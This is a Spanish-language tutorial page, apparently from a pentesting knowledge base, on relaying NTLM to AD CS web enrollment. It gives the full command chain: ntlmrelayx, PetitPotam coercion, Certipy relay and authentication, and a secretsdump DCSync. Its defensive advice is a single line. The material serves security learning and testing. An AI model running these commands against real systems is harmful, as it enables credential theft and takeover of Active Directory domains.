Credenciales

Relay de NTLM a la inscripción web de AD CS

Cómo reenviar una autenticación NTLM al endpoint de inscripción de AD CS y sacar un certificado que sobrevive al cambio de contraseña.

Qué es

El relay de NTLM a la inscripción web de AD CS reenvía una autenticación capturada al endpoint HTTP de inscripción. A cambio, el atacante recibe un certificado a nombre de la identidad reenviada. Ese certificado es una credencial de larga vida: sigue siendo válida aunque se resetee la contraseña de la cuenta.

Cómo funciona

El endpoint de inscripción web de AD CS acepta NTLM sobre HTTP. HTTP no valida la firma NTLM, así que una autenticación reenviada es indistinguible de una legítima. La CA ve una sesión autenticada válida y una plantilla válida, y emite el certificado. El certificado responde a la CA que lo firmó, no a la contraseña de la cuenta. Por eso sobrevive al reseteo de contraseña y sirve para autenticar por PKINIT una y otra vez. Si la identidad reenviada es un Domain Controller, el certificado autentica como esa cuenta de máquina.

Diagrama

Comandos

Levantar el relay hacia el endpoint de inscripción web:

ntlmrelayx.py -t http://<HOST>/certsrv/certfnsh.asp -smb2support --adcs --template <TEMPLATE>

Plantillas típicas: Machine para equipos, DomainController para Domain Controllers.

Forzar la autenticación del objetivo hacia el relay (coerción con MS-EFSRPC):

petitpotam.py -u <USER> -p <PASSWORD> -d <DOMAIN> <LISTENER-IP> <TARGET-IP>

Relay y petición del certificado en una sola herramienta con Certipy:

certipy relay -target http://<HOST> -template <TEMPLATE>

Convertir el certificado (.pfx) en un TGT y el hash NT de la cuenta:

certipy auth -pfx <FILE> -dc-ip <IP>

Si reenviaste un Domain Controller, usar su hash para un DCSync:

secretsdump.py -just-dc -hashes :<HASH> '<DOMAIN>/<HOST>$@<IP>'

Cómo defenderse

Deshabilita la inscripción web de AD CS si no se necesita: elimina esta superficie de ataque por completo.

Siguiente

Puedes seguir leyendo aquí:

CredencialesPrinter Bug: coerción de autenticación

No te pierdas ninguna noticia

Recibe un correo cuando haya alguna actualización importante.

Al suscribirte aceptas la política de privacidad.